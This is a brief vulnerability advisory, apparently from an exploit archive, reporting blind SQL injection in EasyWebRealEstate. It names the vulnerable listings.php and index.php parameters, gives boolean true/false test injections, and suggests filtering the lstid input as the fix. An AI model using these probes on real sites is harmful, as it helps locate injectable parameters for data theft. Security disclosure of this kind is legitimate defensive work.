标题: EasyWebRealEstate Blind SQL Injection Vulnerabilitiy
作者: H4ckCity Security Team  farbodmahini  
软件地址:
影响所有版本: All Version
测试平台: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
示例
#  /[patch]/listings.php?lstid=1 [Blind SQL]
#  /[patch]/index.php?current=tip&infoid=9' [Blind SQL]
#
#
#  Test Blind SQL Injection:
#
#
#  [-] False
#
#  /[patch]/listings.php?lstid=1 and 1=0
#
#  [+] True
#
#  /[patch]/listings.php?lstid=1 and 1=1
#
# 修复
 
过滤listings.php页面lstid参数输入
#